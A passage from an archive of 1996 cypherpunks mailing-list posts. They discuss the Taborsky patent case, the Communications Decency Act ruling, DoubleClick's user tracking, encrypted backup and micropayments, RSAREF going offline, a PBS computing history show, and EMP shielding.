                                                       (v) +1.202.637.9800
PGP Key via finger                                     (f) +1.202.637.0968
http://www.cdt.org/
http://www.cdt.org/homes/jseiger/







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Date: Fri, 14 Jun 1996 10:27:32 +0800
To: (Recipient list suppressed)
Subject: Students Beware -- Fla. gov. questions jailing of researcher
Message-ID: <9606131809.AA28979@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Thu, 13 Jun 1996 13:06:00 -0400
>From: reagle@rpcp.mit.edu (Joseph M. Reagle Jr.)
>To: reagle@rpcp.mit.edu
>Subject: Fla. gov. questions jailing of researcher
>
>
>                                         
>        TALLAHASSEE, Fla., June 12 (UPI) -- Gov. Lawton Chiles said Wednesday  
>he has ordered Florida education officials to determine whether a 
>university researcher jailed in a patent dispute should be freed. 
>        Petr Taborsky, an undergraduate chemistry major who worked for $8.50  
>an hour in a laboratory at the University of South Florida, was 
>sentenced in January to 3 1/2 years in a maximum-security prison. 
>        He had refused to sign over to the school a patent for a new way he  
>discovered to use a substance similar to cat litter to purify water. 
>        ``I don't know what he's doing in prison,'' said Harry Singletary,  
>Florida's prisons chief. ``We need prison beds for violent offenders, 
>for repeat offenders. I don't see him as anybody threatening the public 
>safety.'' 
>        Chiles' general counsel, Dexter Douglass, asked the Florida Board of  
>Regents to look into the university's handling of what he called ``this 
>bizarre case.'' 
>        Douglass has also asked the state's attorney general to look into the  
>prosecution of Taborsky, ``particularly the apparent use of state funds 
>for private attorneys to push criminal penalties.'' 
>        USF reportedly has spent more than $320,000 on the Taborsky case, in  
>addition to the costs of staff attorneys. 
>        Taborsky's legal problems stemmed from a testing contract USF signed  
>in 1987 with Florida Progress Corp., a utility conglomerate. 
>        The contract specified that Florida Progress would own all data and  
>discoveries. But when Taborsky was hired to work on the project, he did 
>not sign an employment contract forfeiting the right to profit in 
>anything he might discover. 
>        When he left school in 1988, Taborsky took two notebooks that USF  
>ordered him to return. When he refused, university police charged him 
>with theft. 
>        Taborsky contended the data contained in the notebooks was from  
>research he conducted separate from the Florida Progress project and 
>that the utility showed no interest in it until he discovered the new 
>water-purification method. 
>        When a jury convicted him of theft in 1990, Taborsky was sentenced to  
>a year's house arrest, 15 years' probation and ordered to make no 
>further use of the data. 
>        But he pursued a patent and in 1992 received the first of three for  
>the process. USF lawyers argued that was a violation of his probation, 
>and the court ordered Taborsky to sign over the patent to the 
>university. 
>        He refused, and was sentenced to 3 1/2 years in prison.  
>        Taborsky began prison life five months ago and has been described as  
>a model inmate. He served on a chain gang at first and by May was 
>working at the institution's waste-water treatment plant creating 
>computer programs to monitor the water. 
>        Singletary said within a few days, he hopes Taborsky will be in a  
>minimum-security work-release center closer to where his parents live. 
>        ``I'm looking for the right place to put him until he can be  
>considered for clemency or whatever else is being looked at,'' 
>Singletary said. 
>        But at least one member of the Board of Regents defended the way USF  
>handled the Taborsky case. 
>        ``It doesn't sound any different to me than a guy who steals books  
>out of the library,'' said Regents Chairman James Heekin. 
>        ``What's the big deal?'' he asked.  
>                
>
>
_______________________
Regards,            Laziness is no more than the habit of resting before you
                    get tired. -Jules Renard
Joseph  Reagle      http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Date: Fri, 14 Jun 1996 09:59:13 +0800
To: cypherpunks@toad.com
Subject: Clinton Backs Internet 'Decency Act'
Message-ID: <9606131809.AA28987@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


At odds with what gore said.....
                         
>         WASHINGTON (Reuter) - President Clinton says the  
>Communications Decency Act is a legal way to protect children 
>from online obscenity, despite a three-judge panel's ruling that 
>blocks large parts of the act. 
>         ``I remain convinced, as I was when I signed the bill, that  
>our Constitution allows us to help parents by enforcing this Act 
>to prevent children from being exposed to objectionable material 
>transmitted through computer networks,'' Clinton said in a 
>statement Wednesday. 
>         He said he would continue to work to shield children from  
>such material and supports ``the development and widespread 
>availability of products that allow both parents and schools to 
>block objectionable materials from reaching computers that 
>children use.'' 
>         Clinton also applauded the communications industry's efforts  
>to rate Internet sites so they are compatible with blocking 
>techniques. 
>         The act, signed into law as part of the sweeping  
>Telecommunications Act of 1996, prohibits the distribution to 
>minors of indecent or ``patently offensive'' materials over 
>computer networks. 
>         The three judges issued an injunction blocking portions of  
>the Communications Decency Act, but let stand prohibitions 
>against obscenity and child pornography and types of speech that 
>are not constitutionally protected. 
>                
>
>
_______________________
Regards,            Laziness is no more than the habit of resting before you
                    get tired. -Jules Renard
Joseph  Reagle      http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 14 Jun 1996 09:54:25 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <2.2.32.19960613180711.00744574@popserver.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


"We're sitting here watching the sun rise for the first time and we've never
even seen the sun"

-- Rush Limbaugh about the Internet on today's show.  Rush also opined that
it was impossible to regulate.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 14 Jun 1996 12:08:36 +0800
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: Anonymous remailers mentioned in CDA decision
In-Reply-To: <Pine.SUN.3.93.960613114908.23962A-100000@viper.law.miami.edu>
Message-ID: <Pine.SUN.3.93.960613140439.13421A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jun 1996, Michael Froomkin wrote:

> Given the extraordinaryly good findings of facts, the government will have
> a very very tough time on appeal.  Shows you what fine lawyering can do.

I, usually a judicial cynic, found the job done by the panel in terms of
findings and judicially noted facts astoundingly complete.

This case has really restored my faith in the ability of the judicial
system to absorb new technologies- not because of the result itself, but
because of the care and weight given to the process.

As Professor Froomkin indicated, appeal will be exceedingly difficult.
Not only are the findings of fact very detailed and extensive, but because
this case did not involve a prosecution, there is no direct way to
point to the evil criminal in a specific, rather than general way.

I think they would be unwise to appeal, but I can also see where the
political considerations would override that basic logic.

I'll poke around a bit and see if I can find out what (if anything) is in
the works.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: foodie@netcom.com (Jamie Lawrence)
Date: Fri, 14 Jun 1996 14:13:42 +0800
To: cypherpunks@toad.com
Subject: Web Based Encrypted Backup
Message-ID: <v02140b01ade634604997@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


Connected Corporation announced DataSafe, a Mac/Windows web based
backup service.

$14.95/Month for 50MB, archival CD-ROM for $24.95 each.

Offers passwords and DES encryption. Storage is on 2 mirrored
sites.

Phone # (508) 270-0035, http://www.connected.com/.

>From thier site:

-------
Security

DataSafe uses the federally approved Data Encryption Standard (DES) with a
56-bit key to encrypt
all of your data before it leaves your PC. This level of encryption is so
powerful, it is not permitted
to be exported outside of the United States (we use a different, but
similarly powerful encryption
scheme for our international customers). You have the option to choose your
own encryption
password, which is never transferred to us over the modem. In this way, no
one but you can read
your data - not when it is in transfer to us, nor when it is being stored
in encrypted format at our
secure operations centers. When this level of encryption is combined with
the fact that we only
transmit the portions of each file that change every day, not the entire
file, the chances that anyone
will be able to read or make use of your data as it travels over the
network are practically eliminated.
DataSafe uses the TCP/IP communications protocol for both its private
dial-up network and
Internet-based services.
--------

I really like the idea of distributed, encrypted backups, but
this strikes me as the kind of thing that has the potential to
get a lot of gullible people in trouble.

Hopefully someone offshore with proven security and a wider choice
of algorithms will compete...

(I don't know if Connected is good at security, so this shouldn't
be construed as a swipe at them. Does anyone know anything about
them?)

-j

--
The signal is the noise.
____________________________________________________________________
Jamie Lawrence   mailto:jal@cyborganic.net  mailto:foodie@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 14 Jun 1996 14:01:31 +0800
To: cypherpunks@toad.com
Subject: Re: Comments on MicroPayments and the Web
Message-ID: <199606132222.PAA09190@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: "Mark M." <markm@voicenet.com>
> I think it would be interesting to see how copyright law will be applied to the
> Web if micropayments ever become popular.  Would memory or disk caching be
> considered fair use?  If so, then people could just set up a very large disk
> cache and maybe delete it every month or so.  It would also be a pretty neat
> hack to use a proxy that only cached pages that charged micropayments.
> Companies would not make a lot of money from things like this.  If disk caching
> was not considered to be fair use, people would still turn it on anyway.

Where does the money come from to run this proxy?

Consider two sites, one which acts as a proxy and cache but which
charges something under a penny per page, and another which acts for
free.  Won't the for-pay site be able to afford a larger disk, more
servers, and better net connections?  It will be a superior service.

Micropayments will allow new services and improved quality over what we
have today where we have to rely on charity and advertising as
motivations for much of what we find on the web.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 14 Jun 1996 15:54:03 +0800
To: cypherpunks@toad.com
Subject: Re: PBS show
Message-ID: <199606132226.PAA12067@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:40 PM 6/13/96 -0400, Warren wrote:
>I enjoyed the show as well...I was a bit young when the Altair was first
>published in Radio Elec., 

Nope.  Popular Electronics.  January, 1975 issue.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 14 Jun 1996 14:22:15 +0800
To: cypherpunks@toad.com
Subject: doubleclick monitoring web browsing habits
Message-ID: <199606132319.QAA14901@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


A post on comp.risks described a web adverstising service called
"doubleclick".  As described in its web pages at <URL:
http://ad.doubleclick.net >, this service provides targetted
advertising on the web.

Participating web sites include links to doubleclick to show graphic
images.  Advertisers sign up with doubleclick and specify profiles for
where and when they want their ads to appear.  Doubleclick then selects
an ad for each user who visits a participating site.  Participating sites
get paid for each such hit, and advertisers pay based on how many hits
are expected.

Apparently this is being used quite a bit.  But what I found disturbing
was the scope of the information being collected by doubleclick.  The
various parameters that advertisers can use in setting up their profiles
for where their ads should appear are described at <URL:
http://ad.doubleclick.net/advertising/adreghelp.htm > and include:

  TARGET BY WEB PAGE/SITE CATEGORY
  TARGET BY SERVICE PROVIDER (SP)
  TARGET BY GEOGRAPHIC LOCATION
   We determine a person's geographic location through the physical
   location of their network or through user registration. We have
   created an extensive map of both organization and Internet Service
   Provider (ISP) networks.
  TARGET BY USER'S OPERATING SYSTEM 
  TARGET BY USER'S BROWSER TYPE 
  TARGET BY HIGH-LEVEL INTERNET DOMAIN TYPE 
  TARGET BY ORGANIZATION TYPE (SIC CODE) 
  TARGET BY ORGANIZATION SIZE OR REVENUE
  TARGET BY PERSONAL INTERESTS
   doubleclick.net continues to add to an extensive database of user
   interests from activity on doubleclick.net member web sites as well as
   from publicly available sources like netnews. User interests are kept
   strictly confidential and will not be released to advertisers. We do
   allow advertisers to target ad banners based on user's interests. The
   more your ad banner is targeted at specific user interests, the more
   likely you are to generate a response. Personal interest categories
   include:
   
   Arts and Literature
   Business, Finance, and Economy
   Computers, Software and Internet
   Culture, Religion, and Society
   Education and InstructionalEntertainment
   Government, Politics, and Military
   Health and Medicine
   News
   Recreation and LeisureScience and Technology
   Social Science
   Sports
   Travel

This last category is the really worrisome one.  doubleclick monitors
the web browsing habits of users whenever they hit a doubleclick-
participating site, and builds up databases about users from that, as
well as from usenet posts.  This is exactly what people have been
talking about as an abuse of privacy on the net.

One question is whether enough information to uniquely identify users
is routinely provided by widely used browsers like Netscape.  I have
refrained from telling my Netscape browser my name and email address out
of fear that it would reveal this information; as a result, I can't use
mailto: links, which is annoying (and also suspicious; lynx allows me to
do mailto: without permanently entering an email address).

This points out the need for browser providers to be sensitive to the
privacy needs of their users and to clearly explain when and under what
circumstances private information is revealed.  It also suggests that
services like www.anonymizer.com will be increasingly important for
people to protect their privacy while browsing.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Fri, 14 Jun 1996 14:51:33 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: Comments on MicroPayments and the Web
In-Reply-To: <2.2.32.19960611193553.00cb57a0@mail.teleport.com>
Message-ID: <Pine.LNX.3.93.960613162617.149A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 11 Jun 1996, Alan Olsen wrote:

> 2)  If a dialog comes up for each site that wants to ding you for a bit of
> money, these sites are going to resemble the pay toilets of the net.  People
> will go there if they have to, but avoid them (or crawl under with an old
> browser) if they can.

I think it would be interesting to see how copyright law will be applied to the
Web if micropayments ever become popular.  Would memory or disk caching be
considered fair use?  If so, then people could just set up a very large disk
cache and maybe delete it every month or so.  It would also be a pretty neat
hack to use a proxy that only cached pages that charged micropayments.
Companies would not make a lot of money from things like this.  If disk caching
was not considered to be fair use, people would still turn it on anyway.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"In Christianity neither morality nor religion come into contact with
reality at any point."
                -- Friedrich Nietzsche


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMcB6ZrZc+sv5siulAQFEKgP/RmelqsXXDaw48s2bIRlmqYdWWt4pMf0s
kJTtxLrMuaNq0ROOtlMp8AvEKVpAs/JTPbut004a4TpEeoCShHiXw0G+wV/1etdA
qqTTRYiEZqEuhTZriHsz8G0Ia3BNwxeSc5QJ81M1FY4GK/CSVjhb8TM41fBSCKkr
blCNM44O9S0=
=LJWg
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 14 Jun 1996 11:29:15 +0800
To: Warren <wxfield@shore.net>
Subject: Re: PBS show
In-Reply-To: <v02140701ade5dbad4bc8@[204.167.110.223]>
Message-ID: <Pine.SOL.3.91.960613165700.6058D-100000@helios.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jun 1996, Warren wrote:

> films...there's a hack. ;)
> 
> BTW-If you are still 'caught up' in the innovative 'demo or die' theme the
> show portrays check out the following site (http://www.be.com/) - I'm sure
> many of you have already been there? Are there any "Be" developers here?
> What are your thoughts?

I've got one - though I haven't had much of a chance to play with it so 
far (Be is in the same building as EIT, and I kept running into jlg in 
the lift :-)

They are pretty cool machines - the back panel is the ultimate in geek 
cool (there about as many ports and sockets as a sparc center 1000). The 
software is pretty alpha (they make no bones about that), and I have some 
reservations about their decision to use C++ as the API to just about all 
of the OS (things get pretty fragile when upgrading), but it's still a 
really cool box, and even if BeOS never pans out completely, you can 
still run Linux on it.

If you're in Menlo Park, definitely get a DEMO, it's the coolest new 
machine on the block. 

Simon
p.s
  does anywhere sell reasonably priced replicas of classic crypto 
hardware? 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Fri, 14 Jun 1996 14:40:10 +0800
To: cypherpunks@toad.com
Subject: Re: PBS show
In-Reply-To: <199606131636.JAA22527@mail.pacifier.com>
Message-ID: <doug-9605132214.AA00145887@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain




>But the Apple II WAS a toy!  Non-detached keyboard, poor placement of reset 
>key, upper-case only, 40-character wide display, odd microprocessor, VERY 
>SMALL capacity floppies (which were very slow as well), as well as a hostile 
>legal situation regarding the building of clones.  Hell, they even objected 
>to other companies building boards which plugged into the bus!
>

The //e made a lot of improvements in this area. uppper+lower case + mouse
text chars support. 80 column cards with double hires graphics. Also,
the floppies weren't that slow compared to the terrible cassette drives in
common use around that time, so some perspective is in order. Clone
situation didn't help them, but then, it didn't help IBM a whole lot either,
though it did wonders for MicroSoft. ;)

Many many many companies developed cards which plugged into the expansion
slots. Problem was, there were too few slots (especially since you
couldn't use slot 3 if you had an 80 column card). :)
(Printer card, modem card, hard disk card, 80 column card, mockingboard/sound
card, graphics tablet/koala pad card, z80 card, RGB graphics card, etc etc..

BTW, what does this have to do with cypherpunks? can we cancel the topic
now?

--
____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu
		Pro is to Con as progress is to congress




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Fri, 14 Jun 1996 16:16:55 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Anonymous remailers mentioned in CDA decision
In-Reply-To: <Pine.SUN.3.93.960613140439.13421A-100000@polaris>
Message-ID: <Pine.SUN.3.93.960613172259.27730B-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jun 1996, Black Unicorn wrote:

> I think they would be unwise to appeal, but I can also see where the
> political considerations would override that basic logic.
> 

The unstated assumption, of course, is that the Justice Dept was really
trying to win...  One wondered, at times...

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.  And humid.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 15 Jun 1996 11:22:00 +0800
To: cypherpunks@toad.com
Subject: Re: PBS show
Message-ID: <199606140030.RAA18846@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:26 AM 6/13/96 +0000, Brad Shantz wrote:

>Since I live 10 blocks away from the main MS Campus, I hear 
>everything there is to hear about Bill Gates.  So, it was really 
>unnecessary for me to watch the hour and a hlaf devoted strictly to 
>who Bill stole what from.  **GRIN**

I only watched a few minutes of the show.  Did they mention that Microsoft 
actually bought the MSDOS operating system from Seattle Computer products?

Also, in about January of 1976, I attended a meeting at a hotel near Kansas 
City International airport, run by MITS (makers of Altair) showing off their 
computer.  (They drove a van around the country and demo'd the computer to 
throngs of...oh...hundreds of people.  

At the time, I had followed the budding microcomputer hobby only a little.  
I specifically recall being told at the show 
of complaints by a company called "Microsoft" that its "4K Basic" was being 
bootlegged.  (Note to the newbies:  The term "4K Basic" meant a Basic 
interpreter that fit in a main memory space of 0.004 megabytes.)   I soon 
learned that they were selling it for about $500, or about 12 cents per 
executable byte.

 
>> Those were exciting times. But, having worked at Intel during those heady
>> days, and being pretty active these days on the Net, I'd have to say the
>> Web, Net, Java, etc. are *just as exciting* (if not more so) than those
>> days. So, the best years are probably yet to come.
>
>Having started my "prefessional" Internet career at SPRY in 1993, I 
>agree that the best of the Internet is yet to come.  Bill Gates said 
>in the show last night that it is almost impossible to judge where 
>the market will be in a year because things are changing so fast.  
>Right now everything is a buzzword.  JAVA, etc...they are all infant 
>technologies that if marketed correctly could lead to the next 
>revolution.

Literally!


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: um@c2.org (Ulf Moeller)
Date: Fri, 14 Jun 1996 08:35:54 +0800
To: cypherpunks@toad.com
Subject: Re: Report from Germany on "backdoor" net-censorship
Message-ID: <9606131610.AA52938@public.uni-hamburg.de>
MIME-Version: 1.0
Content-Type: text/plain


A short update from Germany: The "ICTF" attorney has half-retracted
their announcement on Usenet. "ICTF" is going to be only an
advisory group for ECO members. They will make recommendations
about newsgroups that might be 'dangerous' to carry, and will
only react on individual articles when they are informed about
articles that would be illegal to keep on the news servers.

The "ICTF" plans to use a modified Cancel message format that
will only affect their members' servers.

He says that the press release was not addressed to the net
(well, they tried their best to hide it...) but to journalists
with no clue.

Of course, political harm has been done, but I am glad that the
Social Democratic Party's net expert has severly critizised this
censorship attempt in a press release and on Usenet.

For those who can read German (if you can't you'll sure find the
most important news on Declan's international censorship page), I
have put up a web page on "ICTF" at http://www.thur.de/ulf/zensur/

In September, we will see what they are really going to do
other than issuing bogus press releases.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 15 Jun 1996 10:30:10 +0800
To: Warren <wxfield@shore.net>
Subject: Re: PBS show
In-Reply-To: <v02140701ade5dbad4bc8@[204.167.110.223]>
Message-ID: <Pine.GUL.3.93.960613184135.16782F-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jun 1996, Warren wrote:

> It was (and still is) and addictive feeling to think (back then) "Wow, I
> just did the same thing they were doing with Eniac in my bedroom!"

Isn't that illegal in some states?

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 15 Jun 1996 13:13:33 +0800
To: cypherpunks@toad.com
Subject: SF Bay Area: 6/18 Smart Talk on WhoWhere? (fwd)
Message-ID: <Pine.GUL.3.93.960613184346.16782G-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


FYI. Sounds like a venture capital shindig.

Pity I won't be able to make it. That would have been Highly Amusing.

-rich

---------- Forwarded message ----------
Date: 13 Jun 1996 16:03:52 -0400
From: Leslie Kareckas <lesliek@svi.org>
Newsgroups: ba.smartvalley, ba.announce
Subject: 6/18 Smart Talk on WhoWhere?


    *****************************************************************
                                    
                        PLEASE NOTE NEW LOCATION
                                    
    *****************************************************************
                                    
                               SMART TALK
                                    
                     Sponsored by Smart Valley, Inc.
                    and Gemini Management Consulting


SPEAKER:  Gunjan Sinha
          President, WhoWhere?

TITLE:    WhoWhere?: The Global White Pages of the Internet

DATE:     Tuesday, June 18, 1996

TIME:     7:30 AM - 9:00 AM

LOCATION: Smart Valley, Inc.
          2520 Mission College Blvd.
          Santa Clara

CONTACT:  Isabel Sarkis - IsabelS@svi.org or 408-562-7794

ABSTRACT
WhoWhere? is the largest directory of personal and corporate
phone numbers, physical addresses and e-mail addresses on the
Internet.  As the Net rapidly evolves, defines and redefines
itself, WhoWhere? provides a worldwide collection of fundamental
information which serves both individual and business
communication needs.  It has become the Global White Pages and
enables people to locate others around the world, whether they
are on or off the Net. Gunjan Sinha will share the challenges
associated with building and maintaining this type of directory
and the ways in which it can be utilized.

BIO
Prior to forming WhoWhere? Inc., Gunjan Sinha was the architect
of video servers at Olivetti Advanced Technology, where he
developed interactive video servers. He was also involved with
multiprocessor and distributed server development. Earlier is his
career, Sinha was the co-founder of Viman Software Inc., a
network license management company, which was later acquired by
Central Designs Systems Inc. Sinha holds a Masters in Engineering
Management from Stanford University, and a Masters in Computer
Engineering from the University of California at Santa Cruz.

DIRECTIONS:
Take the Great America Parkway exit North from 101.  Turn right
at the first traffic light (Mission College Boulevard) and go
straight approximately three blocks.  Turn right into the second
UB Networks driveway.  Smart Valley is on the left at 2520
Mission College Blvd. There is ample parking throughout the
campus.

**************************************************************
All are welcome to attend this Smart Talk.  Admission is free to
individual members and all employees of Smart Valley member
companies. Non-members are charged a $5.00 fee. Continental
breakfast is included. Reservations are required as seating is
limited.  RSVP to Isabel Sarkis at IsabelS@svi.org or 408-562-
7794.

Smart Talk announcements can also be found on the Web
(http://www.svi.org).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Howard Melman <melman@osf.org>
Date: Fri, 14 Jun 1996 14:19:41 +0800
To: cypherpunks@toad.com
Subject: RSAREF down?
Message-ID: <9606132300.AA16648@absolut.osf.org.osf.org>
MIME-Version: 1.0
Content-Type: text/plain



Anyone know anything about this?

tmp> ftp ftp.rsa.com
Connected to ftp.rsa.com.
220-
220-Welcome to the RSA Data Security, Inc. FTP Archive.
[...]
220-***************** Special Announcement *******************
220-
220-    RSAREF has been taken down until further notice.
220-    We will keep you informed for any new announcement.
220-
220-***********************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sat, 15 Jun 1996 10:26:54 +0800
To: cypherpunks@toad.com
Subject: Re: RSAREF down?
In-Reply-To: <9606132300.AA16648@absolut.osf.org.osf.org>
Message-ID: <199606140215.TAA18681@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> Anyone know anything about this?
> 
> tmp> ftp ftp.rsa.com
> Connected to ftp.rsa.com.
> 220-
> 220-Welcome to the RSA Data Security, Inc. FTP Archive.
> [...]
> 220-***************** Special Announcement *******************
> 220-
> 220-    RSAREF has been taken down until further notice.
> 220-    We will keep you informed for any new announcement.
> 220-
> 220-***********************************************************

How inconvenient.  I guess people will have to get the software from
one of the many overseas mirror sites. :)

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 14 Jun 1996 14:03:19 +0800
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: Anonymous remailers mentioned in CDA decision
In-Reply-To: <Pine.SUN.3.93.960613172259.27730B-100000@viper.law.miami.edu>
Message-ID: <Pine.SUN.3.93.960613191656.14537A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jun 1996, Michael Froomkin wrote:

> On Thu, 13 Jun 1996, Black Unicorn wrote:
> 
> > I think they would be unwise to appeal, but I can also see where the
> > political considerations would override that basic logic.
> > 
> 
> The unstated assumption, of course, is that the Justice Dept was really
> trying to win...  One wondered, at times...

Excellent point, though I think this would have been a personal decision
on the part of the parties involved rather than a institutional one.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William R. Ward" <hermit@bayview.com>
Date: Fri, 14 Jun 1996 17:29:04 +0800
To: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Subject: [NOISE] Re: PBS show
In-Reply-To: <9606131649.AA28172@rpcp.mit.edu>
Message-ID: <199606140306.UAA14530@komodo.bayview.com>
MIME-Version: 1.0
Content-Type: text/plain



I'm delurking here ... just signed up on cypherpunks, though I've
known about it for a long time.

I don't watch TV, don't have cable, and thus can't watch this PBS show
everyon's a-buzz about.  I would like to see it, though.  I would be
most grateful if someone who has taped it could loan me the tape so I
could watch it.

I live in Santa Cruz, CA, and work in Mountain View; surely someone in
the south bay has been taping this?  I hope so.

--Bill.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Fri, 14 Jun 1996 17:39:23 +0800
To: cypherpunks@toad.com
Subject: Re: Class III InfoWar: TST Article
Message-ID: <199606140308.UAA02340@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


N.B. Joss@netcom.com was not acceptable to netcom

At  1:13 PM 6/13/96 -0800, Norman Hardy wrote:
>EMP (Electro Magnetic Impulse), a side effect of nuclear devices, is
>purportedly able to damage electronics over distances of many miles. Some
>weapons may be designed to enhance this.

I vaguely remember hearing that a nuclear device exploded high over the
midwest would have significant EMP effects over half the continental USA.

When a USSR pilot flew a "state of the art" fighter out and US intelligence
got their hands on it we were surprised that all the electronics were
vacuum tubes.  However, vacuum tubes are highly resistant to EMP.  (They
arc between elements, rather than fry like ICs.)


>Faraday cages attenuate EMP by the same factor that they attenuate secrets.
>I think that if a blast doesn't damage the cage then neither will the EMP.
>Of course the cage may survive but fail to protect the interior
>(insufficient attenuation). I don't know whether a cage sufficient for
>tempest is sufficient for EMP protection. Comm lines and power cables go
>thru the cage and cause problems here as well. Perhaps hefty surge
>protectors suffice here. Communications equipment outside the cage should
>at least be equipped to recover quickly upon transient error and not tear
>donw circuits. Normal error control can then hopefully compensate for the
>transient.  (IP, ATM, Frame relay??)

Makes you want fiber optic comm cable.  Protection inside the cage probably
depends on how powerful the EMP is.  However, the need for some degree of
stealth in Class III InfoWar will limit the strength of the EMP.


-------------------------------------------------------------------------
Bill Frantz       | The Internet may fairly be | Periwinkle -- Consulting
(408)356-8506     | regarded as a never-ending | 16345 Englewood Ave.
frantz@netcom.com | worldwide conversation.    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moltar Ramone <jlasser@rwd.goucher.edu>
Date: Sat, 15 Jun 1996 10:27:10 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: PBS show
In-Reply-To: <ade59c7b06021004a5fd@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.960613212831.5164A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


